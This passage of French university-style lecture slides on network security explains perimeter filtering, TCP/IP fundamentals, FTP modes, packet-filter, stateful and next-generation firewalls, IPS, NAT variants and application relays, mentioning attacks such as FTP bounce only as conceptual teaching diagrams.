SNMP, Netbios, etc.
Ce qui est illégal, non productif
P2P, pédopornographie
Jeux en ligne, pornographie
Les "zones ouvertes" qui doivent être contrôlées
Show Room
WiFi

[email protected] Sécurité Informatique/ March 2, 2020 128 / 459


Protection à l’intérieur

Travail effectué par un filtrage interne. Tout est autorisé en


intra-établissement SAUF
Ce qui est dangereux
Les zones ouvertes
Les zones fragiles doivent être injoignables

[email protected] Sécurité Informatique/ March 2, 2020 129 / 459


Le ciseau à bois

On enlève ce que l’on sait dangereux dans ce qui est autorisé


Le courrier électronique
Le Web
Les services en général

[email protected] Sécurité Informatique/ March 2, 2020 130 / 459


Le courrier électronique

Le SMTP rentre mais


Il ne rentre pas pour ressortir
Il ne doit pas être vecteur de virus
Il est analysé contre le spam (ou plutôt contre tout danger).

[email protected] Sécurité Informatique/ March 2, 2020 131 / 459


Le Web

Le Web sort mais


Certains sites sont interdits
Les nids à virus sont inspectés
On journalise ce qui passe

[email protected] Sécurité Informatique/ March 2, 2020 132 / 459


Les services

Certains services sont offerts, mais


Les serveurs sont patchés
Ils remontent les anomalies
Un détecteur d’anomalies veille
On limite les conséquences des anomalies

[email protected] Sécurité Informatique/ March 2, 2020 133 / 459


Le reste

Le reste sort mais


Limitation des débits
On suit les connexions (journaux)

[email protected] Sécurité Informatique/ March 2, 2020 134 / 459


Le papier de verre

On repère ce qui va être dangereux

[email protected] Sécurité Informatique/ March 2, 2020 135 / 459


Les logs sont nos amis

Les journaux sont nos seuls amis. On va donc faire appel à eux
pour
Les machines internes qui déclenchent des alertes.
Les services qui sont auscultés par l’extérieur
Les alertes récurrentes

[email protected] Sécurité Informatique/ March 2, 2020 136 / 459


Les actions de salubrité publique

On abat les webmestres !

[email protected] Sécurité Informatique/ March 2, 2020 137 / 459


La lazure

On évite que le temps et les intempéries ne nous détruisent la


maison.

[email protected] Sécurité Informatique/ March 2, 2020 138 / 459


La machine à remonter le temps

On fait des sauvegardes


On vérifie qu’elles fonctionnent
On ne les place pas au même endroit que les serveurs
On vérifie qu’elles pourront toujours fonctionner

[email protected] Sécurité Informatique/ March 2, 2020 139 / 459


La dynamo

On met en place la dynamo


E.D.F. en temps de paix : 240 Volts
E.D.F. en temps de grève : 0 Volt
E.D.F. en temps d’orage : 400 Volts
L’onduleur est votre ami. Vous devez l’écouter.

[email protected] Sécurité Informatique/ March 2, 2020 140 / 459


On ferme à clé

Coût d’un pirate professionnel: 2000 e à 200 000 e


Coût d’une femme de ménage : 100 e la journée
Moralité : fermez les portes.
Post scriptum
Temps moyen pour fracturer une serrure de sécurité "simple" : 3 à
30 secondes.

[email protected] Sécurité Informatique/ March 2, 2020 141 / 459


Les protections réseau

Les protections réseau

[email protected] Sécurité Informatique/ March 2, 2020 142 / 459


Comment protéger ?

Dans un monde parfait


Bien concevoir les services
Bien configurer les services
Bien les utiliser
Dans le monde réel
Limiter les accès aux services nécessaires
En nombre de machines
En nombre de services
Limiter les conséquences d’une intrusion

[email protected] Sécurité Informatique/ March 2, 2020 143 / 459


Mais garder à l’esprit
Une protection périmétrique ne protège pas :
du WiFi
des portables infectés
des applications web infectées

[email protected] Sécurité Informatique/ March 2, 2020 144 / 459


D’où l’idée

Séparer les services publics et les services internes


Limiter la communication et la visibilité depuis l’extérieur
Obliger le passage par un point unique de contrôle => Le
pare-feu

[email protected] Sécurité Informatique/ March 2, 2020 145 / 459


Les pare-feux

De nombreux noms
Firewall
Garde-Barrières
Gatekeeper
Qu’est-ce que c’est ?
Comment ça marche ?
Evaluer et choisir un pare-feu

[email protected] Sécurité Informatique/ March 2, 2020 146 / 459


Les pare-feux

Définition réseaux
Types de pare-feux
Types d’architecture
Critères de choix
Perspectives

[email protected] Sécurité Informatique/ March 2, 2020 147 / 459


Politique de sécurité : le firewall

La sortie
Qui ?
Pour quoi ?
L’entrée
Qui ?
Pour quoi ?

[email protected] Sécurité Informatique/ March 2, 2020 148 / 459


Définitions

IP
ICMP
La notion de port
TCP
UDP
Protocoles

[email protected] Sécurité Informatique/ March 2, 2020 149 / 459


IP : Internet Protocol

Protocole de communication
Actuellement en version IPv4
IPv6 en cours de déploiement (Free depuis Décembre 2007)
Chaque machine sur Internet a une adresse IP unique
Les paquets se propagent de routeur en routeur
Protocole non fiable mais résistant

[email protected] Sécurité Informatique/ March 2, 2020 150 / 459


IP : Internet Protocol

Format d’une adresse


Classes (obsolète)
A : de 1.0.0.0 à 127.255.255.255
B : de 128.0.0.0 à 191.255.255.255
C : de 192.0.0.0 à 223.255.255.255
D : de 224.0.0.0 à 239.255.255.255 (Multicast)
Notion de CIDR
Classless InterDomain Routing
Plus assez de classes C ou B disponibles
193.49.48.0/24 ou 193.49.50.0/23

[email protected] Sécurité Informatique/ March 2, 2020 151 / 459


IP : Internet Protocol

Ensemble de diverses adresses non disponibles : RFC3330 (ex


RFC1918)
Adresses privées non routables sur Internet
10.0.0.0/8
172.16.0.0/16 à 172.31.0.0/16
192.168.0.0/24 à 192.168.255.0/24
Adresses spécifiques
127.0.0.0/8
224.0.0.0/4
192.0.2.0/24
169.254.0.0/16
etc.

[email protected] Sécurité Informatique/ March 2, 2020 152 / 459


IP : Internet Protocol

Longueur Type de service


Version en-tête (TOS) Longueur totale en octets

Identification de fragment flags 13-bit décalage fragment


20 octets
TTL Protocole Somme de Contrôle d ’en-tête

Adresse IP source

Adresse IP destination

Options éventuelles (timestamp, source routing, etc…) X fois

Données

32 bits en codage « big endian »

[email protected] Sécurité Informatique/ March 2, 2020 153 / 459


ICMP : Internet Control Message Protocol

Protocole de signalisation
Service/machine/réseau injoignable
Demande de ralentissement
Peut être utilisé pour les attaques
ICMP Redirect
ICMP Echo
Attaque smurf

[email protected] Sécurité Informatique/ March 2, 2020 154 / 459


TCP/UDP: La notion de port

Le port est un numéro de 0 à 65535


Lors d’une communication, le serveur et le client ont chacun
un port utilisé
Chaque machine associe une communication à un quadruplet
(IP-C/Port-C/IP-S/Port-S)

[email protected] Sécurité Informatique/ March 2, 2020 155 / 459


TCP/UDP : La notion de port (2)

Dénomination
Port destination : port du destinataire
Port source : port de l’expéditeur (provenance du paquet)

[email protected] Sécurité Informatique/ March 2, 2020 156 / 459


TCP/UDP : La notion de port (3)

Les ports sont définis par le IANA (http://www.iana.org)


De 1 à 1023 : well known ports ( < et > 512)
TCP/23 : telnet
UDP/53 : DNS
de 1024 à 49151 : user (registered) ports
TCP/3128 : Squid
UDP/2049 : NFS
de 49152 à 65535 : dynamics or private ports

[email protected] Sécurité Informatique/ March 2, 2020 157 / 459


TCP/UDP : La notion de port (4)

Hormis cas exceptionnel, une communication a lieu entre un port


haut et un port bas
Port du serveur généralement < 1024, toujours < 49152
Port du client toujours supérieur à 1023, parfois >=49152

[email protected] Sécurité Informatique/ March 2, 2020 158 / 459


TCP/UDP : Schéma

Client Serveur
65535 65535
… …
49152 49152
49151 49151
… …
1024 1024
1023 1023
… …
1 1

[email protected] Sécurité Informatique/ March 2, 2020 159 / 459


TCP : Transport Control Protocol

Protocole connecté
Assure la cohérence de la connexion
A un début et une fin
Un "triple handshake" initialise la connexion
L’aléa du numéro de séquence n’est pas toujours bon
S’il est prévisible, on peut "simuler" une connexion

[email protected] Sécurité Informatique/ March 2, 2020 160 / 459


TCP : Schéma

Client Serveur
Choix du SYN (1000) Choix du
N° SEQ SYN (2000),ACK(1001) N° SEQ
ACK(2001)
Communication Etablie
Tout paquet possède un ACK

ACK (2300), FIN(1500)


ACK(1501)
ACK(1501),FIN(2300)
ACK(2301)

[email protected] Sécurité Informatique/ March 2, 2020 161 / 459


UDP :User Datagram Protocol

Protocole non connecté


L’application se débrouille
En cas de désordre
En cas de perte de paquet
Plus rapide
Pas d’attente d’acquittement
Peut être utilisé pour du multicast

[email protected] Sécurité Informatique/ March 2, 2020 162 / 459


TCP : Schéma

WWW, FTP, SMTP, etc... DNS, Netmeeting TFTP, SNMP, etc...

TCP (95%) UDP (5%)

ICMP (<1%)

IP

Couche physique (ethernet, ppp, etc...)

[email protected] Sécurité Informatique/ March 2, 2020 163 / 459


Protocoles applicatifs

Situés au dessus des couches TCP et UDP


Ils ont des ordres spécifiques à leur fonction
Souvent ce sont des ordres "lisibles"
SMTP (HELO, DATA, MAIL FROM, etc ...)
Plus ou moins complexes
Port unique fixe (http, smtp, pop, dns, ...)
Port(s) dynamique(s) (ftp, irc, h323, ...)

[email protected] Sécurité Informatique/ March 2, 2020 164 / 459


Protocole simple : HTTP

Client : 1.2.3.4 Serveur : 5.6.7.8

Aléa 1 Etablissement de la connexion


80
Aléa 1 GET http://…..html HTTP/1.0\n\n
80
Aléa 1 <HTML><HEAD>..</HTML>
80
Aléa 1 Coupure de connexion
80

[email protected] Sécurité Informatique/ March 2, 2020 165 / 459


Protocole complexe FTP actif

Client : 1.2.3.4 Serveur : 5.6.7.8

Aléa 1 Etablissement de la connexion 21


Aléa 1 USER ANONYMOUS 21
Aléa 1 331 Enter Password 21
Aléa 1 PASS [email protected] 21
Aléa 1 230 Guest Login OK 21
Aléa 1 PORT 1,2,3,4,X,Y 21
Aléa 1 200 Port OK 21
X*256+Y Etablissement de la connexion 20
Aléa 1 GET fichier 21
X*256+Y données du fichier 20

[email protected] Sécurité Informatique/ March 2, 2020 166 / 459


Protocole complexe FTP actif (flux)

Client : 1.2.3.4 Serveur : 5.6.7.8


Aléa 1 Etablissement de la connexion 21
Aléa 1 USER ANONYMOUS 21
Aléa 1 331 Enter Password 21
Aléa 1 PASS [email protected] 21
Aléa 1 230 Guest Login OK 21
Aléa 1 PORT 1,2,3,4,X,Y 21
Aléa 1 200 Port OK 21
X*256+Y Etablissement de la connexion 20
Aléa 1 GET fichier 21
X*256+Y données du fichier 20

[email protected] Sécurité Informatique/ March 2, 2020 167 / 459


Protocole complexe FTP passif

Client : 1.2.3.4 Serveur : 5.6.7.8

Aléa 1 Etablissement de la connexion 21


Aléa 1 USER ANONYMOUS 21
Aléa 1 331 Enter Password 21
Aléa 1 PASS [email protected] 21
Aléa 1 230 Guest Login OK 21
Aléa 1 PASV 21
Aléa 1 227 Passive 5,6,7,8,X,Y 21
Aléa 2 Etablissement de la connexion X*256+Y
Aléa 1 GET fichier 21
Aléa 2 données du fichier X*256+Y

[email protected] Sécurité Informatique/ March 2, 2020 168 / 459


Protocole complexe FTP passif (flux)

Client : 1.2.3.4 Serveur : 5.6.7.8


Aléa 1 Etablissement de la connexion 21
Aléa 1 USER ANONYMOUS 21
Aléa 1 331 Enter Password 21
Aléa 1 PASS [email protected] 21
Aléa 1 230 Guest Login OK 21
Aléa 1 PASV 21
Aléa 1 227 Passive 5,6,7,8,X,Y 21
Aléa 2 Etablissement de la connexion X*256+Y
Aléa 1 GET fichier 21
Aléa 2 données du fichier X*256+Y

[email protected] Sécurité Informatique/ March 2, 2020 169 / 459


Attaques protocolaires : FTP

Pirate Serveur FTP Serveur SMTP


1.2.3.4 5.6.7.8 "caché"
9.8.7.6
Aléa 1 PORT 9,8,7,6,0,25 21 25
Aléa 1 200 Port OK 21 25
Aléa 1 20 25
Aléa 1 20 25

[email protected] Sécurité Informatique/ March 2, 2020 170 / 459


Les pare-feux

Les filtres de paquets


Les stateful
Les deep inspection
Les IPS

[email protected] Sécurité Informatique/ March 2, 2020 171 / 459


Les pare-feux

Sont placés en "coupure" du réseau


Coupent la communication ou la laissent passer sans la
modifier
Ne nécessitent pas de configurer les machines ou les logiciels

[email protected] Sécurité Informatique/ March 2, 2020 172 / 459


Filtre de paquets : Définition

Décide du passage de chaque paquet sans le replacer dans le


contexte
Suivant les critères du paquet
Source,destination
Options IP,ICMP,UDP,TCP(ACK,SYN,etc ...)
Suivant des critères extérieurs (rares)
heure, charge, etc...

[email protected] Sécurité Informatique/ March 2, 2020 173 / 459


Formalisation

Source : machine qui envoie le paquet


C’est le début de la flèche (cf schéma)
Destination : machine à qui le paquet est envoyé.
C’est la pointe de la flèche.
Source/Destination notion différente de Client/Serveur
Inscrit dans l’en-tête IP des paquets.

[email protected] Sécurité Informatique/ March 2, 2020 174 / 459


Filtre de paquets : Avantages

Le plus rapide, il peut même être placé sur


Des Network processeurs
Des FPGA
des ASICs
Le plus simple à installer
Très efficace pour des séparations de réseaux

[email protected] Sécurité Informatique/ March 2, 2020 175 / 459


Filtre de paquets : Inconvénients

Règles peu lisibles


Règles nombreuses ( plusieurs centaines)
Certains filtrages sont compliqués et imparfaits
FTP
RPC
Ne comprend pas du tout la connexion

[email protected] Sécurité Informatique/ March 2, 2020 176 / 459


Filtre de paquets : Trucs

Toujours définir une règle par défaut


elle existe toujours, mais il faut la définir
Optimisation de la vitesse :
règle de passage générale des paquets acquittés (75%)
Gestion des ICMP
(unreachable, etc ...) : ne pas les renvoyer
Définir les règles sur une autre machine

[email protected] Sécurité Informatique/ March 2, 2020 177 / 459


Filtre de paquets : Trucs 2

Préférer les noms de machines dans la conception des règles


Préférer les adresses IP dans les règles
Utiliser un générateur de règles
Evite les erreurs bêtes

[email protected] Sécurité Informatique/ March 2, 2020 178 / 459


Filtre de paquets : Questions à poser

Ordre des règles :


Séquentiel
A précision décroissante
A branchement
Arrêt sur correspondance (on match) ?
Filtres entrée et sortie ?
Pare-feu auto-protégé
Filtre indépendant sur chaque interface ?

[email protected] Sécurité Informatique/ March 2, 2020 179 / 459


Filtre de paquets : Questions à poser.

Possibilité de mettre des filtres sur des options du paquet


Filtrage sur le port
Capacité de journalisation
Vitesse annoncée pour quelles conditions ? Quasiment
toujours pour
2 machines
1 seule règle (ACCEPT)
1 protocole simple
Gestion des Vlans

[email protected] Sécurité Informatique/ March 2, 2020 180 / 459


Filtrage séquentiel

Règle 1
Règle 2
Règle 3
Règle 4
Règle 5
Règle 6
Règle 7
Règle 8
Règle 9
Règle 10
Règle 11
Règle 12
Règle 13
Règle 14
Règle 15 Pas d ’arrêt sur correspondance

[email protected] Sécurité Informatique/ March 2, 2020 181 / 459


Filtrage par ordre de précision

Règle 1 Règle 2
Règle 2 Règle 4
Règle 3 Règle 6
Règle 4 Règle 7
Règle 5 Règle 5
Règle 6 Règle 3
Règle 7 Règle 1
192.168.0.0/16 ==> 10.0.0.0 PAS OK 192.168.1.0/24 ==> 10.0.0.0 OK
192.168.1.0/24 ==> 10.0.0.0 OK 192.168.0.0/16 ==> 10.0.0.0 PAS OK

[email protected] Sécurité Informatique/ March 2, 2020 182 / 459


Filtrage par branchement

Règle 1
Règle 2 Règle 2.1
Règle 2.2
Règle 2.3
Règle 2.4
Règle 3
Règle 4
Règle 5 Règle 5.1
Règle 5.2 Correspondance
Règle 5.3
Règle 6
Règle 7
Règle 8 Règle 8.1
Règle 8.2
Règle 8.3

[email protected] Sécurité Informatique/ March 2, 2020 183 / 459


Filtre de paquets : Options courantes

Limitation de débit
Eviter les abus internes
Limiter les rebonds de flooding
Journalisation
du refus
des paquets refusés

[email protected] Sécurité Informatique/ March 2, 2020 184 / 459


Filtre de paquets : Exemples

IOS cisco
Filtre commutateurs et routeurs
Iptables (mais peut faire mieux)
Pktfilter sur windows 2K/XP/2003
De manière générale : tout filtre accéléré par ASIC

[email protected] Sécurité Informatique/ March 2, 2020 185 / 459


Filtre de paquets : Les problèmes

Les virtualhost
Les VPS
Les CDN (Akamaï,Fastly, etc.)
qui à l’IP 193.51.224.6 ?
crl.microsoft.com
www.france2.fr
CloudFlare
Super contre les DDoS
Les pirates l’ont bien compris.... ils l’utilisent.

[email protected] Sécurité Informatique/ March 2, 2020 186 / 459


Filtre de paquets : Principe de Netfilter

Interface(s)
Interface(s)
FORWARD

User-defined
INPUT OUTPUT
User-defined

Processus

[email protected] Sécurité Informatique/ March 2, 2020 187 / 459


Filtre de paquets : exercices

Filtrage en entrée
Autorisez du ssh, puis du ftp passif et du ftp actif

Filtrage en sortie
Autorisez du ssh, puis du ftp actif et du ftp passif

[email protected] Sécurité Informatique/ March 2, 2020 188 / 459


Pare-feu stateful inspection

Pourquoi un pare-feu à gestion d’états


Pare-feu filtrant insuffisant
Trop grande ouverture de ports
Idée de conserver l’état de la connexion
Apparition de besoins de NAT

[email protected] Sécurité Informatique/ March 2, 2020 189 / 459


Pare-feu Stateful : Définition

Stateful, Stateful Inspection


Gère les différents états de la connexion (début,milieu,fin)
Ressemble au SYN, SYN-ACK, ACK de TCP. Mais pas tout à
fait
Fait de même avec UDP (Travaille sur les ports et le timeout)
Un critère de filtrage apparaît: l’état.
C’est la seule définition !
Recouvre plusieurs réalités

[email protected] Sécurité Informatique/ March 2, 2020 190 / 459


Pare-feu Stateful : TCP

Serveur IP-S
Port-S Critère d ’état, Timeout
Paquet 1
IP-C:P-C / IP-S:P-S / NEW / 29
Paquet 2 IP-C:P-C / IP-S:P-S / ESTABLISHED / 29 /
Paquet 3 IP-C:P-C / IP-S:P-S / ESTABLISHED / 29 /

Communication

Paquet 1500 IP-C:P-C / IP-S:P-S / ESTABLISHED / 179


Paquet 1501 IP-C:P-C / IP-S:P-S / ESTABLISHED / 179
Rien pendant 300 sec
RIEN ==> Timeout
Paquet 1502
IP-C:P-C / IP-S:P-S / NEW / 29

[email protected] Sécurité Informatique/ March 2, 2020 191 / 459


Pare-feu Stateful : UDP

Client IP-C Serveur IP-S


Port-C Port-S Critère d ’état, Timeout
Paquet 1
IP-C:P-C / IP-S:P-S / NEW / 29
Paquet 2 IP-C:P-C / IP-S:P-S / ESTABLISHED / 29 /
Paquet 3 IP-C:P-C / IP-S:P-S / ESTABLISHED / 29 /

Communication

Paquet 1500
IP-C:P-C / IP-S:P-S / ESTABLISHED / 179
Paquet 1501
IP-C:P-C / IP-S:P-S / ESTABLISHED / 179
Rien pendant 300 sec
RIEN ==> Timeout
Paquet 1502
IP-C:P-C / IP-S:P-S / NEW / 29

[email protected] Sécurité Informatique/ March 2, 2020 192 / 459


Plus simplement

Le fils va dehors avec un seau d’eau => NEW


La fille cours après son frère, trempée => ESTABLISHED
Course poursuite => ESTABLISHED
Ils font la paix => FIN
L’un d’eux se casse la figure => RST
Ils arrêtent pendant 15 minutes => TIMEOUT

[email protected] Sécurité Informatique/ March 2, 2020 193 / 459


Pare-feu stateful : définition (2)

Les meilleurs stateful analysent le contenu (STIC)


Les filtres sont donc dynamiques
Rares sont les STIC qui font tous les protocoles
Certains n’analysent pas du tout le contenu (STI)

[email protected] Sécurité Informatique/ March 2, 2020 194 / 459


Pare-feu Stateful : FTP

Client IP-c Serveur IP-S


Port-C port 21
SYN (1000)
IP-C:P-C / IP-S:21 / NEW / 29
SYN (2000),ACK(1001) IP-C:P-C / IP-S:21 / ESTABLISHED / 29
ACK(2001) IP-C:P-C / IP-S:21 / ESTABLISHED / 890

Communication Etablie

PORT, IP-C,P-C2
IP-C:P-C / IP-S:P-S / ESTABLISHED / 890
200 PORT OK
IP-C:P-C2 / IP-S:20 / RELATED / 890

[email protected] Sécurité Informatique/ March 2, 2020 195 / 459


Pare-feu Stateful : Avantages

Rapide (mais l’analyse du contenu ralentit légèrement)


Plus précis et donc plus efficace (STIC)
Règles plus simples (STIC)
Règles moins nombreuses (STIC)

[email protected] Sécurité Informatique/ March 2, 2020 196 / 459


Pare-feu Stateful : Inconvénients

Attention, l’analyse de contenu n’est pas toujours présente


Ne comprend pas la communication
Tous les protocoles ne peuvent pas passer (X11)

[email protected] Sécurité Informatique/ March 2, 2020 197 / 459


Pare-feu Stateful : Questions à poser

Idem filtre de paquets


STIC ou STI ?
Quels protocoles sont supportés ?
Ajout de nouveaux protocoles
Gestion des N° de séquence ?
Vitesse annoncée pour quelle protection ?
Attention aux optimisations sur le matériel

[email protected] Sécurité Informatique/ March 2, 2020 198 / 459


Pare-feu Stateful : Options courantes

Les mêmes qu’avec les filtres de paquets


Plugin vers des fonctions évoluées
Filtrage d’URL (STIC) par CVP
Lutte antivirale (STIC) par CVP
Plugin vers des relais applicatifs
Authentification sur certains protocoles
Le NAT
Le Tarpit

[email protected] Sécurité Informatique/ March 2, 2020 199 / 459


Pare-feu Stateful : Exemples

Checkpoint Firewall-1 (STIC)


Netfilter (IPTables) de Linux (STIC)
IOS Firewall de CISCO (STIC)
etc.

[email protected] Sécurité Informatique/ March 2, 2020 200 / 459


Pare-feu Stateful : Le NAT

Network Address Translation


Modification de l’adresse visible d’une machine interne (IP-e
au lieu de IP-i)
Deux buts
Pallier à un manque d’adresses (utilisation des RFC3330)
Cacher pour protéger
De nombreuses manières de l’implémenter

[email protected] Sécurité Informatique/ March 2, 2020 201 / 459


Pare-feu Stateful : le NAT : le SNAT

Source Network Address Translation


On change l’adresse du client
C’est l’utilisation principale
Permet d’avoir un grand nombre d’adresses IP

[email protected] Sécurité Informatique/ March 2, 2020 202 / 459


Pare-feu Stateful : le NAT : le SNAT

Externe Interne
123.45.67.89:80  10.1.1.2:3456
123.45.67.89:80  12.1.1.4:3456

123.45.67.89:80  12.1.1.4:3456
123.45.67.89:80  10.1.1.2:3456
Client C1
Serveur S1

[email protected] Sécurité Informatique/ March 2, 2020 203 / 459


Pare-feu Stateful : le NAT : le DNAT

Destination Network Address Translation


Plus rarement utilisée
Pour des serveurs en DMZ
Pour des serveurs derrière une adresse unique
Permet un pseudo équilibrage de charge
Peut-être utilisé pour des processus de diversion

[email protected] Sécurité Informatique/ March 2, 2020 204 / 459


Pare-feu Stateful : le NAT : le DNAT

Externe Interne
123.45.67.89:3456  12.1.1.4:80
123.45.67.89:3456  10.1.1.2:80

123.45.67.89:3456  10.1.1.2:80
123.45.67.89:3456  12.1.1.4:80

Client C1 Serveur S1

[email protected] Sécurité Informatique/ March 2, 2020 205 / 459


Pare-feu Stateful : le NAT dynamique

L’adresse visible fait partie d’un pool


Généralement dans le cas d’un SNAT
Pool-e < Pool-i
La correspondance IP-e et IP-i est variable dans le temps (à la
DHCP)

[email protected] Sécurité Informatique/ March 2, 2020 206 / 459


Pare-feu Stateful : le NAT dynamique

Externe Interne
123.45.67.89:80  10.1.1.2:3456
123.45.67.89:80  12.1.1.4:3456

123.45.67.89:80  12.1.1.4:3456
123.45.67.89:80  10.1.1.2:3456

Serveur S1 Client C1
11.11.11.11 :80  10.1.1.4:6789
11.11.11.11:80  12.1.1.5:6789

11.11.11.11 :80  12.1.1.5:6789


11.11.11.11 :80  10.1.1.4: 6789

Serveur S2 Pare-feu Client C2

[email protected] Sécurité Informatique/ March 2, 2020 207 / 459


Pare-feu Stateful : le NAT : le SAT

Static Address Translation


La correspondance IP-e et IP-i est constante
Réservé à des serveurs accessibles : DNAT
Pour les clients si Pool-e = Pool-i

[email protected] Sécurité Informatique/ March 2, 2020 208 / 459


Pare-feu Stateful : le NAT : le PAT

PAT : Port Address translation


Correspond à la quasi totalité des NAT grand public
Dans le cas où Pool-e = 1
On est obligé de changer le port source pour différencier les
machines
Appelé aussi mascarade
Peut-être utilisé en complément des autres méthodes

[email protected] Sécurité Informatique/ March 2, 2020 209 / 459


Pare-feu Stateful : le NAT : le PAT

Externe 123.45.67.89:80  10.1.1.2:3456


Interne
123.45.67.89:80  12.1.1.3.8001

123.45.67.89:80  12.1.1 .3.8001


123.45.67.89:80  10.1.1.2:3456

Serveur S1 Client C1
11.11.11.11 :80  10.1.1.4:6789
11.11.11.11:80  12.1.1.3.8002

11.11.11.11 :80  12.1.1.3.8002


11.11.11.11 :80  10.1.1.4: 6789

Serveur S2 Pare-feu Client C2

[email protected] Sécurité Informatique/ March 2, 2020 210 / 459


Pare-feu Stateful : le NAT : problème
Les mêmes que le Stateful : où se fait le changement ?
En-têtes IP, TCP et UDP (STI)

Externe Interne
123.45.67.89:21  12.1.1.3:8001 123.45.67.89:21  10.1.1.2:3456

CMD : « port 10,1,1,2,6789 » CMD : « port 10,1,1,2,6789 »

123.45.67.89:20  10,1,1,2,6789

10.1.1.2
!!!

[email protected] Sécurité Informatique/ March 2, 2020 211 / 459


Pare-feu Stateful : le NAT : solution
On ne se limite plus aux en-têtes
En-têtes IP, TCP et UDP (STI)
Et on ajoute :
Modification dans les messages

Externe Interne
123.45.67.89:21  12.1.1.3:8001 123.45.67.89:21  10.1.1.2:3456

CMD : « port 12,1,1,3,8002 » CMD : « port 10,1,1,2,6789 »

123.45.67.89:20  12.1.1.3:8002 123.45.67.89:80  10.1.1.2:6789

[email protected] Sécurité Informatique/ March 2, 2020 212 / 459


NAT et Filtrage : Netfilter

Interface(s) Interface(s)
PREROUTING FORWARD POSTROUTING

User-defined
INPUT OUTPUT
User-defined

Processus

[email protected] Sécurité Informatique/ March 2, 2020 213 / 459


Pare-feu deep-inspection

Terme à relent marketing


Evolution du stateful inspection
Vérifie la conformité aux RFC
A la limite du relais applicatifs (cf suite)
Mais est-ce différent des IPS ?
Concurrencé par la Firewall NG "Next Generation"

[email protected] Sécurité Informatique/ March 2, 2020 214 / 459


Pare-feu Next-Generation

Terme à relent marketing


Evolution du stateful inspection
utilisation de paramètres supplémentaires
l’identité de la personne
l’application (et non plus le port), surtout que tout passe par
le 80.
Facebook
Gmail
GoogleDrive

[email protected] Sécurité Informatique/ March 2, 2020 215 / 459


Pare-feu Next-Generation

Recouvre beaucoup de réalités


Comment se fait la détection de la personne
Par remontée de l’authentification AD ?
Par l’installation d’un client ?
Comment-est utilisée cette authentification ?
Une personne <=> 1 IP ?
Une communication <=> 1 personne ?
Est-ce dynamique ?
Comment sont détectées les applications ?
par schéma ? (donc abonnement ?)
par url ?
par IP ?

[email protected] Sécurité Informatique/ March 2, 2020 216 / 459


Pare-feu NG : avantages

Simplicité de la maintenance (changement d’IP = pas de


changement de droit)
On sait QUI a accès.
On devient très fin dans le filtrage.

[email protected] Sécurité Informatique/ March 2, 2020 217 / 459


Pare-feu NG : inconvénients

Incompatible avec du "wirespeed" (reconstitution des paquets)


Ne pourra jamais aller aussi loin qu’un relais applicatif
Dégâts collatéraux

[email protected] Sécurité Informatique/ March 2, 2020 218 / 459


Pare-feu NG : acteurs

Palo Alto
iptables + L7 Filter + NuFW (UFWi)
Maintenant tout FW est forcément NG.....

[email protected] Sécurité Informatique/ March 2, 2020 219 / 459


Les I.P.S.

Intrusion Prevention System


Encore un niveau supplémentaire vis-à-vis du deep-inspection
Réassemble les paquets
Normalise les communications
Vérifie la conformité aux RFC
Les compare à une base d’attaque
C’est un routeur qui fait de la détection d’intrusion et qui agit
: IDS (Intrusion Detection System) n’était pas assez vendeur

[email protected] Sécurité Informatique/ March 2, 2020 220 / 459


Protection IPS : Avantages

Peut protéger d’attaques très sophistiquées


Ne nécessite pas de modification d’architecture ou des clients
Parfois inattaquable car indétectable (pas d’adresse IP)
Peut couper ou limiter des flux interdits

[email protected] Sécurité Informatique/ March 2, 2020 221 / 459


Protection IPS : Inconvénients

Plus lent encore que le deep inspection (comparaison de


schémas)
Demande une machine adaptée au débit pour des coupures
complexes
Dégâts collatéraux plus nombreux que le deep inspection

[email protected] Sécurité Informatique/ March 2, 2020 222 / 459


Protection IPS : Exemples

StormShield.
Tippingpoint
Snort Inline
Guardian pour iptables
Iptables et module string (très très limité)

[email protected] Sécurité Informatique/ March 2, 2020 223 / 459


Protection IPS : Inconvénients

Plus lent encore que le deep inspection (comparaison de


schémas)
Demande une machine adaptée au débit pour des coupures
complexes
Dégâts collatéraux plus nombreux que le deep inspection

[email protected] Sécurité Informatique/ March 2, 2020 224 / 459


Protection IPS : Questions à poser

Nombre de règles
Mise à jour des règles (qui, d’où)

[email protected] Sécurité Informatique/ March 2, 2020 225 / 459


Les boites noires

Les firewall tout faits :


Ont un OS
CISCO IOS-XR => QNX Neutrino
Juniper JunOS => FreeBSD 4.10
Alcatel TimOS => VXWorks
Huawei VRP => VXWorks
StormShield => FreeBSD
SideWinder => Linux (SeLinux)
Sont parfois aidés de composants

[email protected] Sécurité Informatique/ March 2, 2020 226 / 459


Boites noires et circuits

L’aide hardware est précieuse


Plus rapide
Moins chère
Moins consommatrice
Mais elle pose des problèmes
ASICs : rapides, économiques mais fixes et peu intelligents
FPGA : assez rapides, modifiables mais peu intelligents
Network processors : intelligents, relativement rapides mais
gourmands et chers

[email protected] Sécurité Informatique/ March 2, 2020 227 / 459


Les relais

Après les douves, les ponts

[email protected] Sécurité Informatique/ March 2, 2020 228 / 459


Relais : Définition

Les relais travaillent sur le passage et non la coupure


Le principe est : "laisse faire un professionnel."
Ils dissimulent le client (authentification externe par l’adresse
IP)

[email protected] Sécurité Informatique/ March 2, 2020 229 / 459


Relais : Définition (2)

Réseaux & serveurs Réseaux locaux


distants
Relais

[email protected] Sécurité Informatique/ March 2, 2020 230 / 459


Relais : Définition (3)

Si on ne coupe pas:

[email protected] Sécurité Informatique/ March 2, 2020 231 / 459


Relais : Définition (4)

Relais R

R-S
Règles Serveur S

C-R Accepte
Décision
Port
du
relais R-S2
Machine Redirige
cliente C

Interdit Serveur S2
Logs

[email protected] Sécurité Informatique/ March 2, 2020 232 / 459


Les relais génériques

La standardiste
C’est un relais générique
Généralement placé au niveau circuit (TCP ou UDP)
La communication C-R encapsule la communication C-S.
Le client demande au relais une communication à l’extérieur
Autorisation basée sur
l’origine (machine, port)
la destination (machine, port)
l’identification ou l’authentification du client pour tout
protocole

[email protected] Sécurité Informatique/ March 2, 2020 233 / 459


Relais circuit : Avantages

Laisse passer beaucoup de protocoles


Permet de bloquer
Sur l’origine et la destination
L’identité de l’utilisateur
Journalise
Les protagonistes (leur IP, leur port)
Taille, durée, identité, etc..
Simplicité du serveur
Règles simples
Simplicité du client
Un paramétrage une fois pour toutes

[email protected] Sécurité Informatique/ March 2, 2020 234 / 459


Relais circuit : Inconvénients

Lent
Tous les protocoles ne passent pas
Ne comprend pas la communication
Nécessite l’installation d’une partie cliente
Intégrée dans les outils
Intégrée dans le système par des librairies
Empêche la notion de serveur

[email protected] Sécurité Informatique/ March 2, 2020 235 / 459


Relais circuit : Trucs

Différencier relais d’entrée et relais de sortie


